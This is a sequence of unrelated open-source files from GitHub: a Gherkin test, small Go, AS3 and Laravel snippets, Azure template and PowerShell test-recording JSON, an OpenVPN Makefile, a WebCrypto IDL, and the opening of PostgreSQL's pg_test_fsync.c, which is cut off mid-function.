} |
@ignore
@dataservice
@delete-environment
Feature: Delete environment
Scenario: Delete an environment
Given I create an environment
When I delete the created environment
Then the delete environment response is valid
Scenario: Delete a non-existent environment
When I try to delete a non-existent environment named "non-existent"
Then there should be a ResourceNotFoundException thrown
And the resourceType is "environment"
And the resourceId contains "non-existent"
Scenario: Delete a deleted environment
Given I create an environment
When I delete the created environment
When I try to delete the environment
Then the delete environment response is valid
#TODO: Add invalid parameter tests | {
"pile_set_name": "Github"
} |
// Copyright 2013 hanguofeng. All rights reserved.
// Use of this source code is governed by a MIT-style
// license that can be found in the LICENSE file.
package gocaptcha
import (
"time"
)
// CaptchaInfo is the entity of a captcha
// text:the content text,for the image display and user to recognize
// createTime:the time when the captcha is created
type CaptchaInfo struct {
Text string
CreateTime time.Time
ShownTimes int
}
| {
"pile_set_name": "Github"
} |
{
"$schema": "http://json.schemastore.org/template",
"author": "Microsoft",
"classifications": ["Universal"],
"name": "Cosmos DB",
"shortName": "Cosmos DB",
"groupIdentity": "wts.Feature.Azure.Cosmos",
"identity": "wts.Feature.Azure.Cosmos.SQL",
"description": "Connect your web app to a distributed database service to access and query data using SQL or MongoDB API.",
"tags": {
"language": "Any",
"type": "item",
"wts.type": "feature",
"wts.platform": "Web",
"wts.projecttype": "FullStackWebApp",
"wts.frontendframework": "all",
"wts.backendframework": "all",
"wts.version": "1.0.0",
"wts.displayOrder": "1",
"wts.genGroup": "0",
"wts.rightClickEnabled": "true",
"wts.multipleInstance": "false",
"wts.group": "CloudDatabase"
},
"sourceName": "AzureCosmos",
"preferNameDirectory": true,
"PrimaryOutputs": [],
"symbols": {
"wts.rootNamespace": {
"type": "parameter",
"replaces": "Param_RootNamespace"
}
}
}
| {
"pile_set_name": "Github"
} |
@extends('layouts.error')
@section('title')
503
@endsection
@section('content')
<div class="title">503.</div>
<div class="title">Be right back.</div>
<div class="title">服务器君有点神游。</div>
@endsection
| {
"pile_set_name": "Github"
} |
package {
import com.d_project.qrcode.ErrorCorrectLevel;
import com.d_project.qrcode.QRCode;
import flash.display.Graphics;
import flash.display.Sprite;
public class QRCodeSample1 extends Sprite {
public function QRCodeSample1() {
var width : Number = 200;
var height : Number = 200;
var padding : Number = 10;
var size : Number = Math.min(width, height) - padding * 2;
var xOffset : Number = (width - size) / 2;
var yOffset : Number = (height - size) / 2;
var qr : QRCode = QRCode.getMinimumQRCode("AS3ならば、文字コードの扱いも簡単!", ErrorCorrectLevel.H);
var cs : Number = size / qr.getModuleCount();
var g : Graphics = graphics;
for (var row : int = 0; row < qr.getModuleCount(); row++) {
for (var col : int = 0; col < qr.getModuleCount(); col++) {
g.beginFill( (qr.isDark(row, col)? 0 : 0xffffff) );
g.drawRect(cs * col + xOffset, cs * row + yOffset, cs, cs);
g.endFill();
}
}
}
}
}
| {
"pile_set_name": "Github"
} |
{
"Update-AzConnectedKubernetes+[NoContext]+UpdateExpanded+$PATCH+https://management.azure.com/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourcegroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb?api-version=2020-01-01-preview+1": {
"Request": {
"Method": "PATCH",
"RequestUri": "https://management.azure.com/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourcegroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb?api-version=2020-01-01-preview",
"Content": "{\n \"tags\": {\n \"key2\": \"2\",\n \"key1\": \"1\"\n }\n}",
"Headers": {
},
"ContentHeaders": {
"Content-Type": [ "application/json" ],
"Content-Length": [ "52" ]
}
},
"Response": {
"StatusCode": 200,
"Headers": {
"Cache-Control": [ "no-cache" ],
"Pragma": [ "no-cache" ],
"x-ms-ratelimit-remaining-subscription-writes": [ "1195" ],
"x-ms-request-id": [ "67eff90a-ec7a-4cc2-8d57-3473c952cbbd" ],
"x-ms-correlation-request-id": [ "0e541615-9aac-417c-b57b-a5f08d5a4219" ],
"Server": [ "Kestrel" ],
"x-ms-routing-request-id": [ "SOUTHEASTASIA:20200615T023028Z:0e541615-9aac-417c-b57b-a5f08d5a4219" ],
"Strict-Transport-Security": [ "max-age=31536000; includeSubDomains" ],
"X-Content-Type-Options": [ "nosniff" ],
"Date": [ "Mon, 15 Jun 2020 02:30:27 GMT" ]
},
"ContentHeaders": {
"Content-Length": [ "1265" ],
"Content-Type": [ "application/json; charset=utf-8" ],
"Expires": [ "-1" ]
},
"Content": "{\"id\":\"/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourceGroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb\",\"name\":\"connaks-deq5jb\",\"type\":\"Microsoft.Kubernetes/connectedClusters\",\"location\":\"eastus\",\"tags\":{\"key2\":\"2\",\"key1\":\"1\"},\"identity\":{\"type\":\"SystemAssigned\",\"principalId\":\"d5cd956f-02f6-438e-bbd2-0fbf2345f0fb\",\"tenantId\":\"72f988bf-86f1-41af-91ab-2d7cd011db47\"},\"properties\":{\"provisioningState\":\"Succeeded\",\"agentPublicKeyCertificate\":\"MIICCgKCAgEAt6pHqmxsKsyoArEOEip33Ur3jKAvN53nOWB1Kjoxd/PnZCxaaesZIvdqEuX0K5AVdc+rTjrZE8ibLSEkzNtsjL4wncw8o0ze2sJ487eNrVebzJx3By3XEpTuGEbgDazvECrJtZxUZpiBKsQRFNuTArRF5dkFIyhHFKBbOTTyEjkXaFlI2Zyv3057jAnJL6txpJhxIu/lL2XDJCtVsQF8owpdVedAYroM1UxA6zcLOReHRdXfbbnChWBmog90Mgeyu1acWITGYnoAVi5vOts0P0kBF//YKVPXYqShegmWWzCwOQRWAg3KMkLrVUt66jUnYLpnhhHokdogbDcSNuT1KBCj16YGKWCcgXbWKBYR8sD2dYlIoAZsCnVScXTT5b65bRZBhW69p0jPjt4IgoArjB43hJb/kwEMh+GFE9ZSiS92qOyAWQ5WNEYimUH8lu3pvYIDoPZ2/eX6kz4Dv+pBPp251r5VJBRBvn3apLZ08QfgxjAnTgIJGOAt4Sz6g3ikmvdPHUPbPgEYymPBrxBIML8kOqL5LUeuMAA4i8B10NPU5AM7A0WJZX3TuQOyj5YNhhvztdVbAnbhPwSO1V3y6h9uv7ks27Krp7sLuLMIDangVb61hFkzI7Vm8WCgpSxrWVLSdx5z9dhtMoPdp5NZILUSiLsIuGfq9NpEGWgIZBUCAwEAAQ==\",\"aadProfile\":{\"tenantId\":\"\",\"clientAppId\":\"\",\"serverAppId\":\"\"}}}"
}
},
"Update-AzConnectedKubernetes+[NoContext]+UpdateExpanded+$GET+https://management.azure.com/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourcegroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb?api-version=2020-01-01-preview+2": {
"Request": {
"Method": "GET",
"RequestUri": "https://management.azure.com/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourcegroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb?api-version=2020-01-01-preview",
"Content": null,
"Headers": {
"x-ms-unique-id": [ "33" ],
"x-ms-client-request-id": [ "d75273b2-e209-4b98-be78-0505515208c5" ],
"CommandName": [ "Get-AzConnectedKubernetes" ],
"FullCommandName": [ "Get-AzConnectedKubernetes_Get" ],
"ParameterSetName": [ "__AllParameterSets" ],
"User-Agent": [ "AzurePowershell/Az4.0.0-preview" ],
"Authorization": [ "[Filtered]" ]
},
"ContentHeaders": {
}
},
"Response": {
"StatusCode": 200,
"Headers": {
"Cache-Control": [ "no-cache" ],
"Pragma": [ "no-cache" ],
"x-ms-ratelimit-remaining-subscription-reads": [ "11983" ],
"x-ms-request-id": [ "08dd5b32-46f9-412c-9edd-5f2562680fb4" ],
"x-ms-correlation-request-id": [ "4dcc53d5-8a6b-4f01-972c-efef7181131c" ],
"Server": [ "Kestrel" ],
"x-ms-routing-request-id": [ "SOUTHEASTASIA:20200615T023028Z:4dcc53d5-8a6b-4f01-972c-efef7181131c" ],
"Strict-Transport-Security": [ "max-age=31536000; includeSubDomains" ],
"X-Content-Type-Options": [ "nosniff" ],
"Date": [ "Mon, 15 Jun 2020 02:30:28 GMT" ]
},
"ContentHeaders": {
"Content-Length": [ "1265" ],
"Content-Type": [ "application/json; charset=utf-8" ],
"Expires": [ "-1" ]
},
"Content": "{\"id\":\"/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourceGroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb\",\"name\":\"connaks-deq5jb\",\"type\":\"Microsoft.Kubernetes/connectedClusters\",\"location\":\"eastus\",\"tags\":{\"key2\":\"2\",\"key1\":\"1\"},\"identity\":{\"type\":\"SystemAssigned\",\"principalId\":\"d5cd956f-02f6-438e-bbd2-0fbf2345f0fb\",\"tenantId\":\"72f988bf-86f1-41af-91ab-2d7cd011db47\"},\"properties\":{\"provisioningState\":\"Succeeded\",\"agentPublicKeyCertificate\":\"MIICCgKCAgEAt6pHqmxsKsyoArEOEip33Ur3jKAvN53nOWB1Kjoxd/PnZCxaaesZIvdqEuX0K5AVdc+rTjrZE8ibLSEkzNtsjL4wncw8o0ze2sJ487eNrVebzJx3By3XEpTuGEbgDazvECrJtZxUZpiBKsQRFNuTArRF5dkFIyhHFKBbOTTyEjkXaFlI2Zyv3057jAnJL6txpJhxIu/lL2XDJCtVsQF8owpdVedAYroM1UxA6zcLOReHRdXfbbnChWBmog90Mgeyu1acWITGYnoAVi5vOts0P0kBF//YKVPXYqShegmWWzCwOQRWAg3KMkLrVUt66jUnYLpnhhHokdogbDcSNuT1KBCj16YGKWCcgXbWKBYR8sD2dYlIoAZsCnVScXTT5b65bRZBhW69p0jPjt4IgoArjB43hJb/kwEMh+GFE9ZSiS92qOyAWQ5WNEYimUH8lu3pvYIDoPZ2/eX6kz4Dv+pBPp251r5VJBRBvn3apLZ08QfgxjAnTgIJGOAt4Sz6g3ikmvdPHUPbPgEYymPBrxBIML8kOqL5LUeuMAA4i8B10NPU5AM7A0WJZX3TuQOyj5YNhhvztdVbAnbhPwSO1V3y6h9uv7ks27Krp7sLuLMIDangVb61hFkzI7Vm8WCgpSxrWVLSdx5z9dhtMoPdp5NZILUSiLsIuGfq9NpEGWgIZBUCAwEAAQ==\",\"aadProfile\":{\"tenantId\":\"\",\"clientAppId\":\"\",\"serverAppId\":\"\"}}}"
}
},
"Update-AzConnectedKubernetes+[NoContext]+UpdateViaIdentityExpanded+$GET+https://management.azure.com/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourcegroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb?api-version=2020-01-01-preview+1": {
"Request": {
"Method": "GET",
"RequestUri": "https://management.azure.com/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourcegroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb?api-version=2020-01-01-preview",
"Content": null,
"Headers": {
"x-ms-unique-id": [ "34" ],
"x-ms-client-request-id": [ "8f6ef71a-473b-4d1b-810b-a5b5d7e46d61" ],
"CommandName": [ "Get-AzConnectedKubernetes" ],
"FullCommandName": [ "Get-AzConnectedKubernetes_Get" ],
"ParameterSetName": [ "__AllParameterSets" ],
"User-Agent": [ "AzurePowershell/Az4.0.0-preview" ],
"Authorization": [ "[Filtered]" ]
},
"ContentHeaders": {
}
},
"Response": {
"StatusCode": 200,
"Headers": {
"Cache-Control": [ "no-cache" ],
"Pragma": [ "no-cache" ],
"x-ms-ratelimit-remaining-subscription-reads": [ "11982" ],
"x-ms-request-id": [ "64439cc2-030e-4e95-8a56-204f7b7fae37" ],
"x-ms-correlation-request-id": [ "11157ba1-149c-4e9e-a205-9752e833267f" ],
"Server": [ "Kestrel" ],
"x-ms-routing-request-id": [ "SOUTHEASTASIA:20200615T023029Z:11157ba1-149c-4e9e-a205-9752e833267f" ],
"Strict-Transport-Security": [ "max-age=31536000; includeSubDomains" ],
"X-Content-Type-Options": [ "nosniff" ],
"Date": [ "Mon, 15 Jun 2020 02:30:28 GMT" ]
},
"ContentHeaders": {
"Content-Length": [ "1265" ],
"Content-Type": [ "application/json; charset=utf-8" ],
"Expires": [ "-1" ]
},
"Content": "{\"id\":\"/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourceGroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb\",\"name\":\"connaks-deq5jb\",\"type\":\"Microsoft.Kubernetes/connectedClusters\",\"location\":\"eastus\",\"tags\":{\"key2\":\"2\",\"key1\":\"1\"},\"identity\":{\"type\":\"SystemAssigned\",\"principalId\":\"d5cd956f-02f6-438e-bbd2-0fbf2345f0fb\",\"tenantId\":\"72f988bf-86f1-41af-91ab-2d7cd011db47\"},\"properties\":{\"provisioningState\":\"Succeeded\",\"agentPublicKeyCertificate\":\"MIICCgKCAgEAt6pHqmxsKsyoArEOEip33Ur3jKAvN53nOWB1Kjoxd/PnZCxaaesZIvdqEuX0K5AVdc+rTjrZE8ibLSEkzNtsjL4wncw8o0ze2sJ487eNrVebzJx3By3XEpTuGEbgDazvECrJtZxUZpiBKsQRFNuTArRF5dkFIyhHFKBbOTTyEjkXaFlI2Zyv3057jAnJL6txpJhxIu/lL2XDJCtVsQF8owpdVedAYroM1UxA6zcLOReHRdXfbbnChWBmog90Mgeyu1acWITGYnoAVi5vOts0P0kBF//YKVPXYqShegmWWzCwOQRWAg3KMkLrVUt66jUnYLpnhhHokdogbDcSNuT1KBCj16YGKWCcgXbWKBYR8sD2dYlIoAZsCnVScXTT5b65bRZBhW69p0jPjt4IgoArjB43hJb/kwEMh+GFE9ZSiS92qOyAWQ5WNEYimUH8lu3pvYIDoPZ2/eX6kz4Dv+pBPp251r5VJBRBvn3apLZ08QfgxjAnTgIJGOAt4Sz6g3ikmvdPHUPbPgEYymPBrxBIML8kOqL5LUeuMAA4i8B10NPU5AM7A0WJZX3TuQOyj5YNhhvztdVbAnbhPwSO1V3y6h9uv7ks27Krp7sLuLMIDangVb61hFkzI7Vm8WCgpSxrWVLSdx5z9dhtMoPdp5NZILUSiLsIuGfq9NpEGWgIZBUCAwEAAQ==\",\"aadProfile\":{\"tenantId\":\"\",\"clientAppId\":\"\",\"serverAppId\":\"\"}}}"
}
},
"Update-AzConnectedKubernetes+[NoContext]+UpdateViaIdentityExpanded+$PATCH+https://management.azure.com/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourcegroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb?api-version=2020-01-01-preview+2": {
"Request": {
"Method": "PATCH",
"RequestUri": "https://management.azure.com/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourcegroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb?api-version=2020-01-01-preview",
"Content": "{\n \"tags\": {\n \"key2\": \"2\",\n \"key1\": \"1\",\n \"key3\": \"3\"\n }\n}",
"Headers": {
},
"ContentHeaders": {
"Content-Type": [ "application/json" ],
"Content-Length": [ "69" ]
}
},
"Response": {
"StatusCode": 200,
"Headers": {
"Cache-Control": [ "no-cache" ],
"Pragma": [ "no-cache" ],
"x-ms-ratelimit-remaining-subscription-writes": [ "1194" ],
"x-ms-request-id": [ "aa3ae2a6-0ffd-4302-98e0-f7113da88c01" ],
"x-ms-correlation-request-id": [ "e2f430e8-b619-4801-bb4b-1d94f5149b8b" ],
"Server": [ "Kestrel" ],
"x-ms-routing-request-id": [ "SOUTHEASTASIA:20200615T023033Z:e2f430e8-b619-4801-bb4b-1d94f5149b8b" ],
"Strict-Transport-Security": [ "max-age=31536000; includeSubDomains" ],
"X-Content-Type-Options": [ "nosniff" ],
"Date": [ "Mon, 15 Jun 2020 02:30:32 GMT" ]
},
"ContentHeaders": {
"Content-Length": [ "1276" ],
"Content-Type": [ "application/json; charset=utf-8" ],
"Expires": [ "-1" ]
},
"Content": "{\"id\":\"/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourceGroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb\",\"name\":\"connaks-deq5jb\",\"type\":\"Microsoft.Kubernetes/connectedClusters\",\"location\":\"eastus\",\"tags\":{\"key2\":\"2\",\"key1\":\"1\",\"key3\":\"3\"},\"identity\":{\"type\":\"SystemAssigned\",\"principalId\":\"d5cd956f-02f6-438e-bbd2-0fbf2345f0fb\",\"tenantId\":\"72f988bf-86f1-41af-91ab-2d7cd011db47\"},\"properties\":{\"provisioningState\":\"Succeeded\",\"agentPublicKeyCertificate\":\"MIICCgKCAgEAt6pHqmxsKsyoArEOEip33Ur3jKAvN53nOWB1Kjoxd/PnZCxaaesZIvdqEuX0K5AVdc+rTjrZE8ibLSEkzNtsjL4wncw8o0ze2sJ487eNrVebzJx3By3XEpTuGEbgDazvECrJtZxUZpiBKsQRFNuTArRF5dkFIyhHFKBbOTTyEjkXaFlI2Zyv3057jAnJL6txpJhxIu/lL2XDJCtVsQF8owpdVedAYroM1UxA6zcLOReHRdXfbbnChWBmog90Mgeyu1acWITGYnoAVi5vOts0P0kBF//YKVPXYqShegmWWzCwOQRWAg3KMkLrVUt66jUnYLpnhhHokdogbDcSNuT1KBCj16YGKWCcgXbWKBYR8sD2dYlIoAZsCnVScXTT5b65bRZBhW69p0jPjt4IgoArjB43hJb/kwEMh+GFE9ZSiS92qOyAWQ5WNEYimUH8lu3pvYIDoPZ2/eX6kz4Dv+pBPp251r5VJBRBvn3apLZ08QfgxjAnTgIJGOAt4Sz6g3ikmvdPHUPbPgEYymPBrxBIML8kOqL5LUeuMAA4i8B10NPU5AM7A0WJZX3TuQOyj5YNhhvztdVbAnbhPwSO1V3y6h9uv7ks27Krp7sLuLMIDangVb61hFkzI7Vm8WCgpSxrWVLSdx5z9dhtMoPdp5NZILUSiLsIuGfq9NpEGWgIZBUCAwEAAQ==\",\"aadProfile\":{\"tenantId\":\"\",\"clientAppId\":\"\",\"serverAppId\":\"\"}}}"
}
},
"Update-AzConnectedKubernetes+[NoContext]+UpdateViaIdentityExpanded+$GET+https://management.azure.com/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourcegroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb?api-version=2020-01-01-preview+3": {
"Request": {
"Method": "GET",
"RequestUri": "https://management.azure.com/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourcegroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb?api-version=2020-01-01-preview",
"Content": null,
"Headers": {
"x-ms-unique-id": [ "36" ],
"x-ms-client-request-id": [ "db0ce91f-1780-4150-9f9f-5616637f17ce" ],
"CommandName": [ "Get-AzConnectedKubernetes" ],
"FullCommandName": [ "Get-AzConnectedKubernetes_Get" ],
"ParameterSetName": [ "__AllParameterSets" ],
"User-Agent": [ "AzurePowershell/Az4.0.0-preview" ],
"Authorization": [ "[Filtered]" ]
},
"ContentHeaders": {
}
},
"Response": {
"StatusCode": 200,
"Headers": {
"Cache-Control": [ "no-cache" ],
"Pragma": [ "no-cache" ],
"x-ms-ratelimit-remaining-subscription-reads": [ "11981" ],
"x-ms-request-id": [ "5a61fd44-7494-48b2-a618-59fa538984e6" ],
"x-ms-correlation-request-id": [ "d1163bd2-6f2f-47c0-8bed-b1b81ddcca52" ],
"Server": [ "Kestrel" ],
"x-ms-routing-request-id": [ "SOUTHEASTASIA:20200615T023033Z:d1163bd2-6f2f-47c0-8bed-b1b81ddcca52" ],
"Strict-Transport-Security": [ "max-age=31536000; includeSubDomains" ],
"X-Content-Type-Options": [ "nosniff" ],
"Date": [ "Mon, 15 Jun 2020 02:30:32 GMT" ]
},
"ContentHeaders": {
"Content-Length": [ "1276" ],
"Content-Type": [ "application/json; charset=utf-8" ],
"Expires": [ "-1" ]
},
"Content": "{\"id\":\"/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourceGroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb\",\"name\":\"connaks-deq5jb\",\"type\":\"Microsoft.Kubernetes/connectedClusters\",\"location\":\"eastus\",\"tags\":{\"key2\":\"2\",\"key1\":\"1\",\"key3\":\"3\"},\"identity\":{\"type\":\"SystemAssigned\",\"principalId\":\"d5cd956f-02f6-438e-bbd2-0fbf2345f0fb\",\"tenantId\":\"72f988bf-86f1-41af-91ab-2d7cd011db47\"},\"properties\":{\"provisioningState\":\"Succeeded\",\"agentPublicKeyCertificate\":\"MIICCgKCAgEAt6pHqmxsKsyoArEOEip33Ur3jKAvN53nOWB1Kjoxd/PnZCxaaesZIvdqEuX0K5AVdc+rTjrZE8ibLSEkzNtsjL4wncw8o0ze2sJ487eNrVebzJx3By3XEpTuGEbgDazvECrJtZxUZpiBKsQRFNuTArRF5dkFIyhHFKBbOTTyEjkXaFlI2Zyv3057jAnJL6txpJhxIu/lL2XDJCtVsQF8owpdVedAYroM1UxA6zcLOReHRdXfbbnChWBmog90Mgeyu1acWITGYnoAVi5vOts0P0kBF//YKVPXYqShegmWWzCwOQRWAg3KMkLrVUt66jUnYLpnhhHokdogbDcSNuT1KBCj16YGKWCcgXbWKBYR8sD2dYlIoAZsCnVScXTT5b65bRZBhW69p0jPjt4IgoArjB43hJb/kwEMh+GFE9ZSiS92qOyAWQ5WNEYimUH8lu3pvYIDoPZ2/eX6kz4Dv+pBPp251r5VJBRBvn3apLZ08QfgxjAnTgIJGOAt4Sz6g3ikmvdPHUPbPgEYymPBrxBIML8kOqL5LUeuMAA4i8B10NPU5AM7A0WJZX3TuQOyj5YNhhvztdVbAnbhPwSO1V3y6h9uv7ks27Krp7sLuLMIDangVb61hFkzI7Vm8WCgpSxrWVLSdx5z9dhtMoPdp5NZILUSiLsIuGfq9NpEGWgIZBUCAwEAAQ==\",\"aadProfile\":{\"tenantId\":\"\",\"clientAppId\":\"\",\"serverAppId\":\"\"}}}"
}
}
} | {
"pile_set_name": "Github"
} |
SRC_NAME=openvpn-2.4.x
CFLAGS += -ffunction-sections -fdata-sections
LDFLAGS += -Wl,--gc-sections
all: config_test
$(MAKE) -C $(SRC_NAME)
config_test:
( if [ -f ./config_done ]; then \
echo "the same configuration"; \
else \
make configure && touch config_done; \
fi )
configure:
( cd $(SRC_NAME) ; \
autoreconf -vi ; \
IFCONFIG=/sbin/ifconfig \
ROUTE=/sbin/route \
NETSTAT=/bin/netstat \
./configure \
--prefix=/usr \
--disable-debug \
--disable-plugins \
--disable-pkcs11 \
--disable-ofb-cfb \
--disable-selinux \
--disable-systemd \
--disable-iproute2 \
--disable-management \
--disable-socks \
--enable-small \
--enable-multi \
--enable-server \
--enable-multihome \
--enable-pf \
--enable-fragment \
--enable-http-proxy \
--enable-def-auth \
--enable-ssl \
--enable-crypto \
--enable-lzo \
--with-crypto-library=openssl \
OPENSSL_CRYPTO_CFLAGS="-I$(STAGEDIR)/include" \
OPENSSL_CRYPTO_LIBS="-L$(STAGEDIR)/lib -lcrypto" \
OPENSSL_SSL_CFLAGS="-I$(STAGEDIR)/include" \
OPENSSL_SSL_LIBS="-L$(STAGEDIR)/lib -lssl -lcrypto" \
LZO_CFLAGS="-I$(STAGEDIR)/include" \
LZO_LIBS="-L$(STAGEDIR)/lib -llzo2" \
--with-sysroot=$(STAGEDIR) \
--host=$(HOST_TARGET) \
--build=$(HOST_BUILD) ; \
)
clean:
if [ -f $(SRC_NAME)/Makefile ] ; then \
$(MAKE) -C $(SRC_NAME) distclean ; \
fi ; \
rm -f config_done
romfs:
$(ROMFSINST) $(SRC_NAME)/src/openvpn/openvpn /usr/sbin/openvpn
$(ROMFSINST) /usr/bin/openvpn-cert.sh
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2016 Apple Inc. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS''
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
* THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS
* BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
* THE POSSIBILITY OF SUCH DAMAGE.
*/
enum KeyFormat { "raw", "spki", "pkcs8", "jwk" };
typedef (object or DOMString) AlgorithmIdentifier;
[
Conditional=WEB_CRYPTO,
Exposed=(Window,Worker),
GenerateIsReachable=ImplScriptExecutionContext,
] interface SubtleCrypto {
[CallWith=ExecState] Promise<any> encrypt(AlgorithmIdentifier algorithm, CryptoKey key, BufferSource data);
[CallWith=ExecState] Promise<any> decrypt(AlgorithmIdentifier algorithm, CryptoKey key, BufferSource data);
[CallWith=ExecState] Promise<any> sign(AlgorithmIdentifier algorithm, CryptoKey key, BufferSource data);
[CallWith=ExecState] Promise<any> verify(AlgorithmIdentifier algorithm, CryptoKey key, BufferSource signature, BufferSource data);
[CallWith=ExecState] Promise<any> digest(AlgorithmIdentifier algorithm, BufferSource data);
[CallWith=ExecState] Promise<any> generateKey(AlgorithmIdentifier algorithm, boolean extractable, sequence<CryptoKeyUsage> keyUsages);
[CallWith=ExecState] Promise<any> deriveKey(AlgorithmIdentifier algorithm, CryptoKey baseKey, AlgorithmIdentifier derivedKeyType, boolean extractable, sequence<CryptoKeyUsage> keyUsages);
[CallWith=ExecState] Promise<ArrayBuffer> deriveBits(AlgorithmIdentifier algorithm, CryptoKey baseKey, unsigned long length);
[CallWith=ExecState] Promise<CryptoKey> importKey(KeyFormat format, (BufferSource or JsonWebKey) keyData, AlgorithmIdentifier algorithm, boolean extractable, sequence<CryptoKeyUsage> keyUsages);
Promise<any> exportKey(KeyFormat format, CryptoKey key);
[CallWith=ExecState] Promise<any> wrapKey(KeyFormat format, CryptoKey key, CryptoKey wrappingKey, AlgorithmIdentifier wrapAlgorithm);
[CallWith=ExecState] Promise<CryptoKey> unwrapKey(KeyFormat format, BufferSource wrappedKey, CryptoKey unwrappingKey, AlgorithmIdentifier unwrapAlgorithm, AlgorithmIdentifier unwrappedKeyAlgorithm, boolean extractable, sequence<CryptoKeyUsage> keyUsages);
};
| {
"pile_set_name": "Github"
} |
/*
* pg_test_fsync.c
* tests all supported fsync() methods
*/
#include "postgres_fe.h"
#include <limits.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <fcntl.h>
#include <time.h>
#include <unistd.h>
#include <signal.h>
#include "access/xlogdefs.h"
#include "common/logging.h"
#include "getopt_long.h"
/*
* put the temp files in the local directory
* unless the user specifies otherwise
*/
#define FSYNC_FILENAME "./pg_test_fsync.out"
#define XLOG_BLCKSZ_K (XLOG_BLCKSZ / 1024)
#define LABEL_FORMAT " %-30s"
#define NA_FORMAT "%21s\n"
/* translator: maintain alignment with NA_FORMAT */
#define OPS_FORMAT gettext_noop("%13.3f ops/sec %6.0f usecs/op\n")
#define USECS_SEC 1000000
/* These are macros to avoid timing the function call overhead. */
#ifndef WIN32
#define START_TIMER \
do { \
alarm_triggered = false; \
alarm(secs_per_test); \
gettimeofday(&start_t, NULL); \
} while (0)
#else
/* WIN32 doesn't support alarm, so we create a thread and sleep there */
#define START_TIMER \
do { \
alarm_triggered = false; \
if (CreateThread(NULL, 0, process_alarm, NULL, 0, NULL) == \
INVALID_HANDLE_VALUE) \
{ \
pg_log_error("could not create thread for alarm"); \
exit(1); \
} \
gettimeofday(&start_t, NULL); \
} while (0)
#endif
#define STOP_TIMER \
do { \
gettimeofday(&stop_t, NULL); \
print_elapse(start_t, stop_t, ops); \
} while (0)
static const char *progname;
static unsigned int secs_per_test = 5;
static int needs_unlink = 0;
static char full_buf[DEFAULT_XLOG_SEG_SIZE],
*buf,
*filename = FSYNC_FILENAME;
static struct timeval start_t,
stop_t;
static bool alarm_triggered = false;
static void handle_args(int argc, char *argv[]);
static void prepare_buf(void);
static void test_open(void);
static void test_non_sync(void);
static void test_sync(int writes_per_op);
static void test_open_syncs(void);
static void test_open_sync(const char *msg, int writes_size);
static void test_file_descriptor_sync(void);
#ifndef WIN32
static void process_alarm(int sig);
#else
static DWORD WINAPI process_alarm(LPVOID param);
#endif
static void signal_cleanup(int sig);
#ifdef HAVE_FSYNC_WRITETHROUGH
static int pg_fsync_writethrough(int fd);
#endif
static void print_elapse(struct timeval start_t, struct timeval stop_t, int ops);
#define die(msg) do { pg_log_error("%s: %m", _(msg)); exit(1); } while(0)
int
main(int argc, char *argv[])
{
pg_logging_init(argv[0]);
set_pglocale_pgservice(argv[0], PG_TEXTDOMAIN("pg_test_fsync"));
progname = get_progname(argv[0]);
